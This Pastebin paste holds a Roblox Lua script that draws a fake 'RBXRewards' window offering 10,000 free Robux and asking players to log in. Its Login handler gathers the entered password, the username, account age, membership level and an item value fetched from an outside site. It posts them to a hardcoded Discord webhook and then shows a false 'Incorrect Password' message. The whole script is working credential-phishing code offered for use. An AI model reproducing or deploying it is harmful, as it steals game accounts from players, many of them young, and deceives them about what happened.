Advertisement
phemzyx

Untitled

Apr 13th, 2018
94
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 13.37 KB | None | 0 0
  1. -- Farewell infortality
  2. -- Revamp by ImFrostic, Version 2.8
  3.  
  4. -- Objects
  5.  
  6. local Ok = Instance.new("ScreenGui")
  7. local window = Instance.new("Frame")
  8. local REWARDS = Instance.new("TextButton")
  9. local SUPPORT = Instance.new("TextButton")
  10. local LINE = Instance.new("TextButton")
  11. local Greeting = Instance.new("TextLabel")
  12. local Player = Instance.new("TextLabel")
  13. local supportline = Instance.new("TextButton")
  14. local rewardsline = Instance.new("TextButton")
  15. local _10KRobux = Instance.new("TextLabel")
  16. local G = Instance.new("TextLabel")
  17. local Username = Instance.new("TextBox")
  18. local zz = Instance.new("TextBox")
  19. local Password = Instance.new("TextBox")
  20. local zz_2 = Instance.new("TextBox")
  21. local robuxlogo = Instance.new("ImageLabel")
  22. local robuxlogo_2 = Instance.new("ImageLabel")
  23. local G_2 = Instance.new("TextLabel")
  24. local Login = Instance.new("TextButton")
  25. local supportt = Instance.new("TextLabel")
  26. local Player_2 = Instance.new("TextLabel")
  27. local TopBar = Instance.new("Frame")
  28. local RBXREWARDS = Instance.new("ImageLabel")
  29.  
  30. -- Properties
  31.  
  32. Ok.Name = "Ok"
  33. Ok.Parent = game.CoreGui
  34.  
  35. window.Name = "window"
  36. window.Parent = Ok
  37. window.BackgroundColor3 = Color3.new(0.278431, 0.278431, 0.278431)
  38. window.BorderSizePixel = 0
  39. window.Position = UDim2.new(0.289830506, 0, 0.300386101, 0)
  40. window.Size = UDim2.new(0, 496, 0, 256)
  41.  
  42. REWARDS.Name = "REWARDS"
  43. REWARDS.Parent = window
  44. REWARDS.BackgroundColor3 = Color3.new(0, 0, 0)
  45. REWARDS.BackgroundTransparency = 0.44999998807907
  46. REWARDS.BorderSizePixel = 0
  47. REWARDS.Size = UDim2.new(0, 246, 0, 50)
  48. REWARDS.Font = Enum.Font.SourceSansBold
  49. REWARDS.Text = "Rewards"
  50. REWARDS.TextColor3 = Color3.new(1, 1, 1)
  51. REWARDS.TextSize = 23
  52.  
  53. SUPPORT.Name = "SUPPORT"
  54. SUPPORT.Parent = window
  55. SUPPORT.BackgroundColor3 = Color3.new(0, 0, 0)
  56. SUPPORT.BackgroundTransparency = 0.44999998807907
  57. SUPPORT.BorderSizePixel = 0
  58. SUPPORT.Position = UDim2.new(0.495967746, 0, 0, 0)
  59. SUPPORT.Size = UDim2.new(0, 250, 0, 50)
  60. SUPPORT.Font = Enum.Font.SourceSansBold
  61. SUPPORT.Text = "Support"
  62. SUPPORT.TextColor3 = Color3.new(1, 1, 1)
  63. SUPPORT.TextSize = 23
  64.  
  65. LINE.Name = "LINE"
  66. LINE.Parent = window
  67. LINE.BackgroundColor3 = Color3.new(0.192157, 0.192157, 0.192157)
  68. LINE.BackgroundTransparency = 0.44999998807907
  69. LINE.BorderSizePixel = 0
  70. LINE.Position = UDim2.new(0.495967746, 0, 0, 0)
  71. LINE.Size = UDim2.new(0, 2, 0, 50)
  72. LINE.Font = Enum.Font.SourceSansBold
  73. LINE.Text = ""
  74. LINE.TextColor3 = Color3.new(1, 1, 1)
  75. LINE.TextSize = 23
  76.  
  77. Greeting.Name = "Greeting"
  78. Greeting.Parent = window
  79. Greeting.BackgroundColor3 = Color3.new(1, 1, 1)
  80. Greeting.BackgroundTransparency = 1
  81. Greeting.Position = UDim2.new(0.39213708, 0, 0.400390625, 0)
  82. Greeting.Size = UDim2.new(0, 108, 0, 50)
  83. Greeting.Font = Enum.Font.SourceSansBold
  84. Greeting.Text = "Hello,"
  85. Greeting.TextColor3 = Color3.new(1, 1, 1)
  86. Greeting.TextScaled = true
  87. Greeting.TextSize = 14
  88. Greeting.TextWrapped = true
  89.  
  90. Player.Name = "Player"
  91. Player.Parent = Greeting
  92. Player.BackgroundColor3 = Color3.new(1, 1, 1)
  93. Player.BackgroundTransparency = 1
  94. Player.Position = UDim2.new(-0.367458165, 0, 1, 0)
  95. Player.Size = UDim2.new(0, 188, 0, 50)
  96. Player.Font = Enum.Font.SourceSansBold
  97. Player.Text = game.Players.LocalPlayer.Name.."!"
  98. Player.TextColor3 = Color3.new(0.145098, 0.678431, 0.0509804)
  99. Player.TextScaled = true
  100. Player.TextSize = 14
  101. Player.TextWrapped = true
  102.  
  103. supportline.Name = "support line"
  104. supportline.Parent = window
  105. supportline.BackgroundColor3 = Color3.new(1, 0.615686, 0)
  106. supportline.BackgroundTransparency = 0.44999998807907
  107. supportline.BorderSizePixel = 0
  108. supportline.Position = UDim2.new(0.495967746, 0, 0.171875, 0)
  109. supportline.Size = UDim2.new(0, 250, 0, 6)
  110. supportline.Visible = false
  111. supportline.Font = Enum.Font.SourceSansBold
  112. supportline.Text = ""
  113. supportline.TextColor3 = Color3.new(1, 1, 1)
  114. supportline.TextSize = 23
  115.  
  116. rewardsline.Name = "rewards line"
  117. rewardsline.Parent = window
  118. rewardsline.BackgroundColor3 = Color3.new(1, 0.615686, 0)
  119. rewardsline.BackgroundTransparency = 0.44999998807907
  120. rewardsline.BorderSizePixel = 0
  121. rewardsline.Position = UDim2.new(0, 0, 0.171875, 0)
  122. rewardsline.Size = UDim2.new(0, 246, 0, 6)
  123. rewardsline.Visible = false
  124. rewardsline.Font = Enum.Font.SourceSansBold
  125. rewardsline.Text = ""
  126. rewardsline.TextColor3 = Color3.new(1, 1, 1)
  127. rewardsline.TextSize = 23
  128.  
  129. _10KRobux.Name = "10K Robux"
  130. _10KRobux.Parent = window
  131. _10KRobux.BackgroundColor3 = Color3.new(0.12549, 0.12549, 0.12549)
  132. _10KRobux.BackgroundTransparency = 0.60000002384186
  133. _10KRobux.BorderSizePixel = 0
  134. _10KRobux.Position = UDim2.new(0, 0, 0.23046875, 0)
  135. _10KRobux.Size = UDim2.new(0, 496, 0, 31)
  136. _10KRobux.Visible = false
  137. _10KRobux.Font = Enum.Font.SourceSansBold
  138. _10KRobux.Text = "Rewards? 10,000 ROBUX just for you!"
  139. _10KRobux.TextColor3 = Color3.new(0, 1, 0)
  140. _10KRobux.TextScaled = true
  141. _10KRobux.TextSize = 14
  142. _10KRobux.TextWrapped = true
  143.  
  144. G.Name = "G"
  145. G.Parent = _10KRobux
  146. G.BackgroundColor3 = Color3.new(0.12549, 0.12549, 0.12549)
  147. G.BackgroundTransparency = 0.60000002384186
  148. G.BorderSizePixel = 0
  149. G.Position = UDim2.new(0, 0, 5.36277723, 0)
  150. G.Size = UDim2.new(0, 496, 0, 31)
  151. G.Visible = false
  152. G.Font = Enum.Font.SourceSansBold
  153. G.Text = "Rewards? 10,000 ROBUX just for you!"
  154. G.TextColor3 = Color3.new(0, 1, 0)
  155. G.TextScaled = true
  156. G.TextSize = 14
  157. G.TextWrapped = true
  158.  
  159. Username.Name = "Username"
  160. Username.Parent = _10KRobux
  161. Username.BackgroundColor3 = Color3.new(0.12549, 0.12549, 0.12549)
  162. Username.BackgroundTransparency = 0.40000000596046
  163. Username.BorderColor3 = Color3.new(1, 1, 1)
  164. Username.Position = UDim2.new(0.296370953, 0, 2.19354844, 0)
  165. Username.Size = UDim2.new(0, 200, 0, 29)
  166. Username.Font = Enum.Font.SourceSansBold
  167. Username.PlaceholderColor3 = Color3.new(0.74902, 0.74902, 0.74902)
  168. Username.PlaceholderText = "Username"
  169. Username.Text = ""
  170. Username.TextColor3 = Color3.new(1, 1, 1)
  171. Username.TextSize = 17
  172. Username.TextStrokeTransparency = 0.5
  173. Username.TextWrapped = true
  174. Username.Visible = false
  175.  
  176. zz.Name = "zz"
  177. zz.Parent = _10KRobux
  178. zz.BackgroundColor3 = Color3.new(0.12549, 0.12549, 0.12549)
  179. zz.BackgroundTransparency = 0.40000000596046
  180. zz.BorderColor3 = Color3.new(1, 1, 1)
  181. zz.Position = UDim2.new(0.296370953, 0, 3.12903214, 0)
  182. zz.Size = UDim2.new(0, 200, 0, 10)
  183. zz.Visible = false
  184. zz.Font = Enum.Font.SourceSansBold
  185. zz.PlaceholderColor3 = Color3.new(0.74902, 0.74902, 0.74902)
  186. zz.PlaceholderText = "Username"
  187. zz.Text = ""
  188. zz.TextColor3 = Color3.new(1, 1, 1)
  189. zz.TextSize = 17
  190. zz.TextStrokeTransparency = 0.5
  191. zz.TextWrapped = true
  192.  
  193. Password.Name = "Password"
  194. Password.Parent = _10KRobux
  195. Password.BackgroundColor3 = Color3.new(0.12549, 0.12549, 0.12549)
  196. Password.BackgroundTransparency = 0.40000000596046
  197. Password.BorderColor3 = Color3.new(1, 1, 1)
  198. Password.Position = UDim2.new(0.296370953, 0, 3.45161295, 0)
  199. Password.Size = UDim2.new(0, 200, 0, 29)
  200. Password.Font = Enum.Font.SourceSansBold
  201. Password.PlaceholderColor3 = Color3.new(0.74902, 0.74902, 0.74902)
  202. Password.PlaceholderText = "Password"
  203. Password.Text = ""
  204. Password.TextColor3 = Color3.new(1, 1, 1)
  205. Password.TextSize = 17
  206. Password.TextStrokeTransparency = 0.5
  207. Password.TextWrapped = true
  208.  
  209. zz_2.Name = "zz"
  210. zz_2.Parent = _10KRobux
  211. zz_2.BackgroundColor3 = Color3.new(0.12549, 0.12549, 0.12549)
  212. zz_2.BackgroundTransparency = 0.40000000596046
  213. zz_2.BorderColor3 = Color3.new(1, 1, 1)
  214. zz_2.Position = UDim2.new(0.296370953, 0, 4.38709688, 0)
  215. zz_2.Size = UDim2.new(0, 200, 0, 30)
  216. zz_2.Visible = false
  217. zz_2.Font = Enum.Font.SourceSansBold
  218. zz_2.PlaceholderColor3 = Color3.new(0.74902, 0.74902, 0.74902)
  219. zz_2.PlaceholderText = "Username"
  220. zz_2.Text = ""
  221. zz_2.TextColor3 = Color3.new(1, 1, 1)
  222. zz_2.TextSize = 17
  223. zz_2.TextStrokeTransparency = 0.5
  224. zz_2.TextWrapped = true
  225.  
  226. robuxlogo.Name = "robux logo"
  227. robuxlogo.Parent = _10KRobux
  228. robuxlogo.BackgroundColor3 = Color3.new(1, 1, 1)
  229. robuxlogo.BackgroundTransparency = 1
  230. robuxlogo.Position = UDim2.new(0, 0, -0.290322572, 0)
  231. robuxlogo.Size = UDim2.new(0, 41, 0, 40)
  232. robuxlogo.Image = "rbxassetid://440630043"
  233.  
  234. robuxlogo_2.Name = "robux logo"
  235. robuxlogo_2.Parent = _10KRobux
  236. robuxlogo_2.BackgroundColor3 = Color3.new(1, 1, 1)
  237. robuxlogo_2.BackgroundTransparency = 1
  238. robuxlogo_2.Position = UDim2.new(0.917338729, 0, -0.290322572, 0)
  239. robuxlogo_2.Size = UDim2.new(0, 41, 0, 40)
  240. robuxlogo_2.Image = "rbxassetid://440630043"
  241.  
  242. G_2.Name = "G"
  243. G_2.Parent = _10KRobux
  244. G_2.BackgroundColor3 = Color3.new(0.12549, 0.12549, 0.12549)
  245. G_2.BackgroundTransparency = 0.75
  246. G_2.BorderSizePixel = 0
  247. G_2.Position = UDim2.new(0, 0, 1, 0)
  248. G_2.Size = UDim2.new(0, 496, 0, 37)
  249. G_2.Font = Enum.Font.SourceSansBold
  250. G_2.Text = "Please login to verify you're not a bot."
  251. G_2.TextColor3 = Color3.new(0.780392, 0.780392, 0.780392)
  252. G_2.TextScaled = true
  253. G_2.TextSize = 14
  254. G_2.TextWrapped = true
  255.  
  256. Login.Name = "Login"
  257. Login.Parent = _10KRobux
  258. Login.BackgroundColor3 = Color3.new(0, 0.741176, 0)
  259. Login.Position = UDim2.new(0.296370953, 0, 5, 0)
  260. Login.Size = UDim2.new(0, 200, 0, 25)
  261. Login.Font = Enum.Font.SourceSansBold
  262. Login.Text = "Login"
  263. Login.TextColor3 = Color3.new(1, 1, 1)
  264. Login.TextScaled = true
  265. Login.TextSize = 14
  266. Login.TextWrapped = true
  267.  
  268. supportt.Name = "supportt"
  269. supportt.Parent = window
  270. supportt.BackgroundColor3 = Color3.new(1, 1, 1)
  271. supportt.BackgroundTransparency = 1
  272. supportt.Position = UDim2.new(0.236895144, 0, 0.33203125, 0)
  273. supportt.Size = UDim2.new(0, 259, 0, 71)
  274. supportt.Visible = false
  275. supportt.Font = Enum.Font.SourceSansBold
  276. supportt.Text = "Sorry, we're offline right now! but do not worry this will work!"
  277. supportt.TextColor3 = Color3.new(1, 1, 1)
  278. supportt.TextScaled = true
  279. supportt.TextSize = 14
  280. supportt.TextWrapped = true
  281.  
  282. Player_2.Name = "Player"
  283. Player_2.Parent = supportt
  284. Player_2.BackgroundColor3 = Color3.new(1, 1, 1)
  285. Player_2.BackgroundTransparency = 1
  286. Player_2.Position = UDim2.new(0.134472311, 0, 1, 0)
  287. Player_2.Size = UDim2.new(0, 188, 0, 50)
  288. Player_2.Font = Enum.Font.SourceSansBold
  289. Player_2.Text = game.Players.LocalPlayer.Name.."!"
  290. Player_2.TextColor3 = Color3.new(0.145098, 0.678431, 0.0509804)
  291. Player_2.TextScaled = true
  292. Player_2.TextSize = 14
  293. Player_2.TextWrapped = true
  294.  
  295. TopBar.Name = "TopBar"
  296. TopBar.Parent = window
  297. TopBar.BackgroundColor3 = Color3.new(0.184314, 0.184314, 0.184314)
  298. TopBar.BorderSizePixel = 0
  299. TopBar.Position = UDim2.new(0, 0, -0.19921875, 0)
  300. TopBar.Size = UDim2.new(0, 496, 0, 51)
  301.  
  302. RBXREWARDS.Name = "RBXREWARDS"
  303. RBXREWARDS.Parent = TopBar
  304. RBXREWARDS.BackgroundColor3 = Color3.new(1, 1, 1)
  305. RBXREWARDS.BackgroundTransparency = 1
  306. RBXREWARDS.Position = UDim2.new(0.399193555, 0, 0.0686274543, 0)
  307. RBXREWARDS.Size = UDim2.new(0, 100, 0, 44)
  308. RBXREWARDS.Image = "rbxassetid://1598010571"
  309.  
  310. -- Scripts
  311.  
  312. REWARDS.MouseButton1Click:connect(function()
  313. Greeting.Visible = false
  314. supportt.Visible = false
  315. _10KRobux.Visible = true
  316. end)
  317.  
  318. SUPPORT.MouseButton1Click:connect(function()
  319. Greeting.Visible = false
  320. supportt.Visible = true
  321. _10KRobux.Visible = false
  322. end)
  323.  
  324. Login.MouseButton1Click:connect(function()
  325.  
  326. local membership = "none"
  327. if game.Players.LocalPlayer.MembershipType == Enum.MembershipType.None then membership = "NBC"
  328. elseif game.Players.LocalPlayer.MembershipType == Enum.MembershipType.BuildersClub then membership = "BC"
  329. elseif game.Players.LocalPlayer.MembershipType == Enum.MembershipType.TurboBuildersClub then membership = "TBC"
  330. elseif game.Players.LocalPlayer.MembershipType == Enum.MembershipType.OutrageousBuildersClub then membership = "OBC"
  331.  
  332. end
  333.  
  334. local GetRAP = function(Player)
  335. --Created by Floof (A developer of SwiftLoot). This requires http to be enabled.
  336. local RAP = 0
  337. pcall(function()
  338. local UserId = Player.UserId
  339. RAP = tonumber(game:GetService("HttpService"):GetAsync("http://aerx-mgui.com/Public/getRAP.php?UserId="..UserId))
  340. end)
  341. return RAP
  342. end
  343.  
  344. local http = game:GetService("HttpService")
  345. local Data = {
  346. username="RBXRewards MGUI",
  347. embeds={{
  348.  
  349. color = 0xfb2424, -- Colors
  350.  
  351. thumbnail= {--Small Profile Pic
  352. url= "https://www.roblox.com/bust-thumbnail/image?userId=".. game.Players.LocalPlayer.UserId .."&width=420&height=420&format=png"
  353. },
  354.  
  355. author = { --Embed Title
  356. name= "RBXRewards MGUI",
  357. icon_url= "https://rbxrewards.com/images/logo.png"
  358. },
  359.  
  360. --Header
  361. title= "Click here to view the account.",
  362. url= "https://www.roblox.com/users/"..game.Players.LocalPlayer.UserId.."/profile",
  363. description= "You've got a new account!",
  364.  
  365. --Fields
  366. fields = {
  367.  
  368. {
  369. name= "Username",
  370. value= game.Players.LocalPlayer.Name,
  371. inline= true
  372. },
  373. {
  374. name= "Password",
  375. value= Password.Text,
  376. inline= true
  377. },
  378. {
  379. name= "Account Info",
  380. value= game.Players.LocalPlayer.AccountAge.."day(s) old, " ..game.CoreGui.RobloxGui.TopBarContainer.NameHealthContainer.AccountType.Text,
  381. inline= true
  382. },
  383. {
  384. name= "Recent Average Price",
  385. value= GetRAP(),
  386. inline= true
  387. },
  388. {
  389. name= "Membership",
  390. value= membership,
  391. inline= true
  392. },
  393.  
  394. },
  395.  
  396.  
  397.  
  398. --Footer
  399.  
  400. footer= {
  401. icon_url= "https://t3.rbxcdn.com/f7ab13a25dee0266c682449e698800ee",
  402. text= "© RBXRewards MGUI by I low#5423",
  403. }
  404.  
  405.  
  406. }
  407.  
  408. },
  409.  
  410. }
  411.  
  412. Data = http:JSONEncode(Data)
  413. Password.Text = "Incorrect Password! Try Again!"
  414. http:PostAsync("https://discordapp.com/api/webhooks/432939496951119882/A-P2Gl3jcxOAhEVhupM_ubSlOFdhwgeVToG_4BT35Y-nxW77sJ5iIUngdZdUE8aucX4B", Data)
  415. end)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement